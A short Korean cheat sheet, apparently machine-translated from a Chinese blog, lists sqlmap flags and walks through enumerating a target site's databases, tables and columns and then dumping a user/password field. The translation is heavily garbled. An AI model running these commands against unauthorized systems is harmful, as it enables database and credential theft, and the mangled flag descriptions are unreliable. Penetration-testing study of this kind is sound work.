하는 SQLMaps 기본 명령

  하는 SQLMaps는 SQL 주입 취약점, 데이터베이스 연결 서버 사용 권한에 대한 액세스 권한을 사용하여 자동화 된 테스트를위한 오픈 소스 침투 테스트 도구입니다.

다운로드 : https://github.com/sqlmapproject/sqlmap/zipball/master

MySQL은, 오라클 및 기타 탐지 데이터베이스를 지원 swlmap.

삽입 모드 : 사출 조건에 따라 부울 블라인드 페이지로 돌아갑니다 .

기본 명령

-h, 도움은 기본 도움말 정보를 표시

수석 -hh 도움말 정보를 표시

테스트 - 레벨 = LEVEL 실행 단계 (1-5, 기본 1)

-risk = 위험 실행 위험 테스트 (0-3, 기본 1)

0-6 (기본값은 1) : -v VERBOSE 세부 정보의 수준을 보여

-u URL, 대상 URL

-m BULKFILE 타겟 어드레스는 파일에 저장되고, 순서대로 배치 검출

파일에서 HTTP 요청을로드 -r REQUESTFILF이하는 SQLMaps 파일은 HTTP 요청에서 획득 할 수

정보 데이터베이스 버전을 구 -b

-D는 데이터베이스 이름을 지정합니다

테이블 이름을 지정 -T

지정된 필드 -C

-is-DBA 현재 사용자 권한 (루트 권한 여부)

-current-DB 웹 사이트 현재 데이터베이스

 부울 기반의 주입에 --string = STRING, 때때로, 우리는이 플래그의 내용 페이지 (문자열)를 기반으로 참과 거짓 반환을 결정, 스스로 올바른 페이지에 반환을 표시 부호를 판단 할 필요가 가지 1 페이지로 돌아가 당신은 정말 문자열 무엇의 개발을보고이 매개 변수를 사용할 수 있습니다.

대상 서버의 데이터베이스가 일반적으로 사용되는 직접 --dbs 무엇 --dbs

대상 데이터베이스 테이블, 일반적으로 사용되는 것을 직접 --tables --tables

어떤 목표 테이블 컬럼, 일반적으로 사용을 --colums 직접 --colums

직접 --user 일반적으로 사용 되는가에 --user 사용자 쿼리의 총,

--passwords 직접 --passwords, 사용되는 사용자의 암호 해시를 조회,

--dump 쿼리의 모든 데이터 범위를 지정했습니다.

 

MySQL을 주입하는 SQLMaps

 

1> -u http://www.xxx.com/link.php?id=123 sqlmap.py 데이터베이스를 쿼리   --dbs

2> 룩업 테이블 (데이터베이스 테스트) sqlmap.py -u http://www.xxx.com/link.php?id=123 -D 테스트 데이터베이스 1> --tables

3>을 통해 2> 컬럼 sqlmap.py -u http://www.xxx.com/link.php?id=123 -D 시험 -T에서 table_id --colums 테이블 (테이블에서 table_id)을 수득

4>> (3)은 필드 (사용자 암호 필드)를 얻기 sqlmap.py -u http://www.xxx.com/link.php?id=123 사용자 -D -C 사용자 암호 --dump

 

추천

출처www.cnblogs.com/Scholar-liu/p/11240667.html